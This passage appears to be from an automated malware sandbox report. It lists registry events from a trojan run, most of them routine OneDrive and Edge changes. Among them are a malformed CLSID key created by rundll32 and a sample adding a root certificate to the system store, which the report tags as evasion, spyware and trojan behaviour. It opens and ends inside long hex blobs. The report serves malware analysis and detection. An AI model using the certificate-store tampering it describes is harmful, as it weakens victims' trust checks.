ace8a66e48260e65cdb43c08347575fc08f39b6d077a38a3bb5dade8b27a88e2e8e268622ac8e1c9a861e908e04ac2e860a8489f37afbfbfa7288f9f9fefefffffa768cfd7d727273737a7a007171767677777a7e0475757a7a8b8b8a820889898e8e8f8f8a860c8d8d828283838a0a80818906090784848a8f058a8a9b9b9898929b099e9e9f9f9c98060808029393909091919a9c069797949495959a900aababa8a8a9a9aaa40eafafacacadadaaa802a3a3a0a0a1a1aaac06a7a7a4a4a5a5a0aa0abbbbb8b802ccc60ac24c8cbdb50a21230213190a123727020705babe09f5f401fdde2a09e1eccdc505eee30dddf12905dad7c4c80c2a2e04101808d9d9deda09a1a001ad2282d3d30d9c99059a97001a1f05dadaebebe8e8e26b89eee20c1c1cede10c1ab9a704010d0c0707e4e4eaef05eaeafbfbf8f8faf309fefefffffcfcfaf70df2f2f3f3f0f0fafb01f6f6f7f7f4f4f2f705faf505505c000814100a0b0b080809090a040e0f0f0c0c0d0d0a08020303000001010a0c060707040405050a000a1b1b181819191a140e1f1f1c1c1d1d1a18021313101011111a1c061717141415151a100a2b2b282829292a240e2f2f2c2c2d2d2a28022323202021212a2c062727242425252a200a3b3b383839393a340e3f3f3c3c3d3d3a38023333303031313a3c063737343435353a300a4b4b4848494940eea60abebc02a0aa0aa2a0029236ae0a96940288820a8a88027e244b7f6c035152584a7861767582d050cccc09838b51580088d053c5c6181272f289c9c383fe7e8e0e89a62b8da90c2481b43185b9388178fd857dd226897ef38d72f785352a1408656c0950548a88111103cdcd5f5fccc70bcfc807dedd03d9d95f5fd8d30bdbdc07eae903e5e54f6aaa8bd05f8fd35083e266d357e56e8be46b8fe76483f672d357f9728bf8778ffb7880098ed3540e86880f838c0c8c801d9ad354129a88139f8c10908021a6d35426ae8827ab8c24a48035b2d3543ab2883bb78c38b88049ced3544ec6884fc38c4ccc805ddad35452da8853df8c50d08061ed78f46d94e4e4e5a2b50beeffe8d8d8df36291b2a7afafb7f0925270f78f8f9780897990e9693999c959c7b62b42480ac9e8bbf4f30f38aa82088af218eae28da5cad2f82bc3c80b33586b23adc54b13b8ab03888b466396d86c66c2e84c9438ace9898428ccd4bd452dc5c80d35586d25684d15fd45ad05888d7598ed65a8cdaeedd42a70aece804fff906fefe00f0b94695cd7caf82fc7c80f37228097ba5f08e6de19c796a54540646501001060257575c5c56580e515908505a0a535354546264066d6d006c6e026f6f5c5c6e600e69610868620a6b6a55547a7c06757a1a9d8e62e4da5c61e38270f08077f18676f0d25475ff8a74fc887bf58e7afcda5c79fb828808808f09868e0bd1548d078a8c0595ed6d6d6b9c5252afa30caea00ea9a108a8a4565aabaf04babc06b5ba35cd67d04f35cd68930ccec00ec9c95858c8c20acbcf04dadc06d5d9e3a5bd6d67dfdfdf1f16a4dfe24440a4d6d3283d0ec2dcdcc8a8ab5292c187860d553fec8f0d83d04a101717606b000a747e0a5b71a48e4ec58b8681b0b101b6972e2aefc61595b838867f01cb2d0583af6f411991a92b4b40a5e54741194005060127280aa00a27a1248b8f05868d1d120f13c6cb1188890d13032b8de764b98119d04523bf092b452bd5956f6f296965ceab65657777717173737d7d7f7f79797dd6aa04041617414143434d2d250958cbcf95d0045bd38557d4a375ddb931554b7e6cec6dad716c5e3e33c5a005666127486afa77a14d09eb8f637d6d720f756b71e88960bdc36277057b656af98377699789152bb0886068cec7baad67fe72fb716f93b81ad1717171717171717170f18171919c848a8a6068436baa28af0ea4aa0b4ac983f77881f05eab0b0c8b8709051b988ced4e2f8cded008232a39bc8aad80a38e9a9538384ec587b699ae8df5f54bcbdf5f5a5882d15154545adae0e808ecef83969b0d8a0783eeef8ffdfdf1740bb637839e1f8d83088966e40b80036dc9ab096f620b4e5c6383f1f1e1e1efee01e1e1e1e1e1e1e1e1e1e1e1e1e1e1e06181e1e1e101098 C:\Windows\SysWOW64\rundll32.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{C1439245-96B4-47FC-B391-679386C5D40F}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "237" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ProgID\ = "NucleusToastActivator.NucleusToastActivator.1" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{B5C25645-7426-433F-8A5F-42B7FF27A7B2}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\grvopen\shell C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "238" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "239" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\CLSID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{F904F88C-E60D-4327-9FA2-865AD075B400}\1.0\FLAGS\ = "0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "22" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "237" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler\shell\import\DropTarget\CLSID = "{5999E1EE-711E-48D2-9884-851A709F543D}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ = "ISyncEngineOcsi" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IIRT641V-ST1Y-V6LD-W3TL-UIUSI353MX63} C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\PROGID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "en-US" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "239" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ = "IFileUploadCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ = "StorageProviderUriSource Class" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696